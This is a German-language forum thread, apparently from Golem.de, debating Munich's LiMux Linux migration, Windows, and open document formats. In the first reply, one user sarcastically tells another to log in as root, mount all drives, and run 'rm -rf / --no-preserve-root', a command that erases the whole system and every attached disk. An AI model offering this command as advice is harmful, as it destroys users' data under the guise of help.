1. Foren
  2. Kommentare
  3. Wirtschaft-Forum
  4. Alle Kommentare zum Artikel
  5. › Limux: Windows-Rückkehr würde…
  6. Thema

Selber schuld, hätten sie es von vornherein gelassen...

Neue Foren im Freiraum! Raumfahrt und freie Software haben jetzt einen Platz, die Games tummeln sich jetzt alle in einem Forum.
  1. Thema
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5

Neues Thema Ansicht wechseln


  1. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Wallbreaker 15.10.14 - 11:06

    tux. schrieb:
    --------------------------------------------------------------------------------
    > Aus irgendwelchen fragwürdigen Gründen (wahrscheinlich sind da irgendwelche
    > Fanboy-Azubis reingestürmt und haben "Scheißwindoooooof, nehmt Ubuntu als
    > Basis, is voll super ey" krakeelt) eine funktionierende Infrastruktur durch
    > halbgaren Mist (der obendrein ständig mit neuen großen Lücken in den
    > Nachrichten ist) auszutauschen kann man als Privatmensch schon machen, von
    > einer Stadtverwaltung hätte ich allerdings mehr Hirn erwartet.
    >
    > Lernen durch Schmerz.

    Ah ein neuer Troll, machs auch dir nicht so schwer.

    Terminal:

    1. su
    2. Passwort
    3. Mounte alle Datenträger die du besitzt, inkl. USB Sticks
    4. rm -rf / --no-preserve-root

    Drück Enter, geh kurz aufs Klo, und freu dich wenn du wieder zurück bist.

  2. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: plutoniumsulfat 15.10.14 - 11:09

    Thiesi schrieb:
    --------------------------------------------------------------------------------
    > 0mega42 schrieb:
    > ---------------------------------------------------------------------------
    > > Offene Standards bringen für ALLE Nutzer Vorteile. Ich verstehe einfach
    >
    > Ist das jemals irgendwo belegt worden? Zudem: Wo setzt man denn mit der
    > Definition eines Standards an? Was hat man beispielsweise gewonnen, wenn
    > München/alle Verwaltungen anstatt M$ Word künftig LibreOffice nutzen, um
    > ausschließlich .docx-Dokumente zu verarbeiten?

    Wenn es alle verwenden, braucht es kein .docx mehr. Das ist der Mehrwert.

  3. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Thiesi 15.10.14 - 11:11

    plutoniumsulfat schrieb:
    --------------------------------------------------------------------------------

    > Wenn es alle verwenden, braucht es kein .docx mehr. Das ist der Mehrwert.

    Ja, & wenn alle GIMP verwenden, braucht es kein Photoshop mehr. Oder wie?

  4. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: plutoniumsulfat 15.10.14 - 11:12

    Photoshop ist das Programm, .docx ein Format.

  5. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Niaxa 15.10.14 - 11:14

    Leg dich mal ne Stunde aufs Ohr, war ein anstrengender Morgen für dich.

    @TE:

    Du hast scheinbar nicht viel Ahnung. Ich weis nicht was du dir vorstellst, wie es in solchen Verwaltungen zu geht, aber ich kann dir sagen es sind ganz andere Entscheidungsgründe vorhanden, wie irgendwelche Vorlieben von irgendwelchen Nutzern.

  6. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Thiesi 15.10.14 - 11:16

    Danke.

  7. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: WarumLinuxBesserIst 22.10.14 - 18:13

    http://www.computerwoche.de/a/freie-software-sucht-nach-wegen-in-die-kommunalverwaltung,2557330#
    Vor allem die letzten zwei Sätze treffen das genau. Warum soll man unnötig an Microsoft Lizenzkosten abdrücken, wenn es doch eh aus der Cloud kommt.

    Und der Cloudserver ist sowieso in den meisten Fällen ein Linux Server

    *********************************************************************
    * * * * * Mein Kanal auf YouTube: WarumLinuxBesserIst
    *********************************************************************

  1. Thema
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. Senior IT Systemadministrator (m/w/d)
    ASYS Automatisierungssysteme GmbH, Dornstadt
  2. Technischer Projektleiter (m/w/d)
    IHSE GmbH, Oberteuringen
  3. IT-Professional (m/w/d) - Systemverwaltung
    Polizeipräsidium Oberbayern Süd, Rosenheim
  4. Senior Software Entwickler (m/w/d) mit Schwerpunkt PLC
    SUSS MicroTec Lithography GmbH, Garching bei München

Detailsuche


Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. 499,99€


Haben wir etwas übersehen?

E-Mail an news@golem.de